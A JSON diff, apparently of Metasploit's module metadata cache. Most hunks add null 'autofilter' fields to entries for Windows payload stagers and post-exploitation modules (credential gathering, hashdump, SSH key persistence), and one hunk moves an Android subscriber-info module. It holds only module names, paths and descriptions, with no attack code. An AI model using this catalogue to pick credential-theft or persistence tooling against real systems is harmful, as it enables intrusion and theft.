"/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", @@ -113091,6 +142265,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", @@ -113123,6 +142299,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", @@ -113155,6 +142333,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", @@ -113187,6 +142367,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb", @@ -113218,6 +142400,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb", @@ -113249,6 +142433,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb", @@ -113280,6 +142466,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb", @@ -113311,6 +142499,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb", @@ -113342,6 +142532,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb", @@ -113373,6 +142565,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb", @@ -113404,6 +142598,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb", @@ -113433,6 +142629,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", @@ -113463,6 +142661,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", @@ -113493,6 +142693,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", @@ -113522,6 +142724,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", @@ -113552,6 +142756,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", @@ -113581,6 +142787,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", @@ -113615,6 +142823,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-04 17:43:15 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", @@ -113645,6 +142855,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", @@ -113674,6 +142886,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb", @@ -113703,6 +142917,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb", @@ -113733,6 +142949,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", @@ -113764,6 +142982,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", @@ -113795,6 +143015,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", @@ -113825,6 +143047,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", @@ -113856,6 +143080,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", @@ -113887,6 +143113,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", @@ -113920,6 +143148,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", @@ -113950,6 +143180,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", @@ -113985,6 +143217,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-04 17:43:15 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", @@ -114016,6 +143250,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", @@ -114047,6 +143283,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", @@ -114078,6 +143316,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", @@ -114107,6 +143347,8 @@ "platform": "AIX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/aix/hashdump.rb", @@ -114136,6 +143378,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/android/capture/screen.rb", @@ -114147,6 +143391,37 @@ "notes": { } }, + "post_android/gather/sub_info": { + "name": "extracts subscriber info from target device", + "full_name": "post/android/gather/sub_info", + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Auxilus" + ], + "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.", + "references": [ + + ], + "is_server": false, + "is_client": false, + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2018-10-01 16:54:46 +0000", + "path": "/modules/post/android/gather/sub_info.rb", + "is_install_path": true, + "ref_name": "android/gather/sub_info", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "post_android/gather/wireless_ap": { "name": "Displays wireless SSIDs and PSKs", "full_name": "post/android/gather/wireless_ap", @@ -114166,6 +143441,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-06 17:37:12 +0000", "path": "/modules/post/android/gather/wireless_ap.rb", @@ -114198,6 +143475,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/android/manage/remove_lock.rb", @@ -114227,6 +143506,8 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/android/manage/remove_lock_root.rb", @@ -114238,35 +143519,6 @@ "notes": { } }, - "post_android/sub_info": { - "name": "extracts subscriber info from target device", - "full_name": "post/android/sub_info", - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Auxilus" - ], - "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.", - "references": [ - - ], - "is_server": false, - "is_client": false, - "platform": "Android", - "arch": "", - "rport": null, - "targets": null, - "mod_time": "2018-07-26 16:48:34 +0000", - "path": "/modules/post/android/sub_info.rb", - "is_install_path": true, - "ref_name": "android/sub_info", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - } - }, "post_cisco/gather/enum_cisco": { "name": "Cisco Gather Device General Information", "full_name": "post/cisco/gather/enum_cisco", @@ -114285,6 +143537,8 @@ "platform": "Cisco", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/cisco/gather/enum_cisco.rb", @@ -114314,6 +143568,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/cookies.rb", @@ -114343,6 +143599,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/history.rb", @@ -114372,6 +143630,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/passwords.rb", @@ -114401,6 +143661,8 @@ "platform": "Firefox", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/gather/xss.rb", @@ -114430,6 +143692,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/firefox/manage/webcam_chat.rb", @@ -114459,6 +143723,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/automotive/canprobe.rb", @@ -114488,6 +143754,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-11 18:20:57 +0000", "path": "/modules/post/hardware/automotive/getvinfo.rb", @@ -114517,6 +143785,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/automotive/identifymodules.rb", @@ -114546,6 +143816,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/automotive/malibu_overheat.rb", @@ -114578,6 +143850,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-12-17 18:15:49 +0000", "path": "/modules/post/hardware/automotive/pdt.rb", @@ -114607,6 +143881,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb", @@ -114636,6 +143912,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/rftransceiver/transmitter.rb", @@ -114665,6 +143943,8 @@ "platform": "Hardware", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/hardware/zigbee/zstumbler.rb", @@ -114694,6 +143974,8 @@ "platform": "Juniper", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-30 14:20:01 +0000", "path": "/modules/post/juniper/gather/enum_juniper.rb", @@ -114723,6 +144005,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/enum_connections.rb", @@ -114752,6 +144036,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/enum_hosts.rb", @@ -114781,6 +144067,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/linux/busybox/jailbreak.rb", @@ -114810,6 +144098,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/ping_net.rb", @@ -114839,6 +144129,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/set_dmz.rb", @@ -114868,6 +144160,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/set_dns.rb", @@ -114897,6 +144191,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/smb_share_root.rb", @@ -114926,6 +144222,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/busybox/wget_exec.rb", @@ -114956,6 +144254,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/linux/dos/xen_420_dos.rb", @@ -114985,6 +144285,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-06 00:46:09 +0000", "path": "/modules/post/linux/gather/checkcontainer.rb", @@ -115014,6 +144316,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-04 19:12:27 +0000", "path": "/modules/post/linux/gather/checkvm.rb", @@ -115043,6 +144347,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/ecryptfs_creds.rb", @@ -115072,6 +144378,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_configs.rb", @@ -115102,6 +144410,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-30 15:32:04 +0000", "path": "/modules/post/linux/gather/enum_network.rb", @@ -115131,6 +144441,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-29 06:52:47 +0000", "path": "/modules/post/linux/gather/enum_protections.rb", @@ -115160,6 +144472,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_psk.rb", @@ -115193,6 +144507,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_system.rb", @@ -115222,6 +144538,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_users_history.rb", @@ -115251,6 +144569,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/enum_xchat.rb", @@ -115280,6 +144600,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/gnome_commander_creds.rb", @@ -115309,6 +144631,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/gnome_keyring_dump.rb", @@ -115338,6 +144662,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-16 00:56:32 +0000", "path": "/modules/post/linux/gather/hashdump.rb", @@ -115367,6 +144693,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-29 22:34:38 +0000", "path": "/modules/post/linux/gather/mount_cifs_creds.rb", @@ -115397,6 +144725,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/gather/openvpn_credentials.rb", @@ -115427,6 +144757,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-07 11:13:09 +0000", "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb", @@ -115456,6 +144788,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-12 17:11:29 +0000", "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb", @@ -115485,6 +144819,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-06-07 20:08:23 +0000", "path": "/modules/post/linux/gather/tor_hiddenservices.rb", @@ -115514,6 +144850,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/manage/download_exec.rb", @@ -115543,6 +144881,8 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/linux/manage/sshkey_persistence.rb", @@ -115573,6 +144913,8 @@ "platform": "Unix", "arch": "", "rport": 443, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/escalate/aws_create_iam_user.rb", @@ -115605,6 +144947,8 @@ "platform": "Linux,OSX", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/escalate/cups_root_file_read.rb", @@ -115636,6 +144980,8 @@ "platform": "BSD,Linux,Unix", "arch": "", "rport": 2940, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb", @@ -115666,6 +145012,8 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/apple_ios_backup.rb", @@ -115695,6 +145043,8 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-02 15:55:24 +0000", "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb", @@ -115725,6 +145075,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/aws_keys.rb", @@ -115754,6 +145106,8 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/check_malware.rb", @@ -115783,6 +145137,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/dbvis_enum.rb", @@ -115812,6 +145168,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/dns_bruteforce.rb", @@ -115841,6 +145199,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/dns_reverse_lookup.rb", @@ -115870,6 +145230,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 19:38:43 +0000", "path": "/modules/post/multi/gather/dns_srv_lookup.rb", @@ -115899,6 +145261,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-25 18:15:24 +0000", "path": "/modules/post/multi/gather/docker_creds.rb", @@ -115928,6 +145292,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/gather/enum_vbox.rb", @@ -115958,6 +145324,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/env.rb", @@ -115987,6 +145355,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/fetchmailrc_creds.rb", @@ -116017,6 +145387,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/filezilla_client_cred.rb", @@ -116046,6 +145418,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/find_vmx.rb", @@ -116077,6 +145451,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/firefox_creds.rb", @@ -116106,6 +145482,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-28 10:16:59 +0000", "path": "/modules/post/multi/gather/gpg_creds.rb", @@ -116135,6 +145513,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/irssi_creds.rb", @@ -116164,6 +145544,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/jboss_gather.rb", @@ -116193,6 +145575,8 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-10 15:25:09 +0000", "path": "/modules/post/multi/gather/jenkins_gather.rb", @@ -116224,6 +145608,8 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/gather/lastpass_creds.rb", @@ -116253,6 +145639,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-26 17:52:11 +0000", "path": "/modules/post/multi/gather/maven_creds.rb", @@ -116282,6 +145670,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/multi_command.rb", @@ -116311,6 +145701,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/netrc_creds.rb", @@ -116340,6 +145732,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/pgpass_creds.rb", @@ -116370,6 +145764,8 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/pidgin_cred.rb", @@ -116399,6 +145795,8 @@ "platform": "BSD,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/ping_sweep.rb", @@ -116428,6 +145826,8 @@ "platform": "BSD,Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-30 15:45:52 +0000", "path": "/modules/post/multi/gather/remmina_creds.rb", @@ -116457,6 +145857,8 @@ "platform": "Python,Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/multi/gather/resolve_hosts.rb", @@ -116486,6 +145888,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", 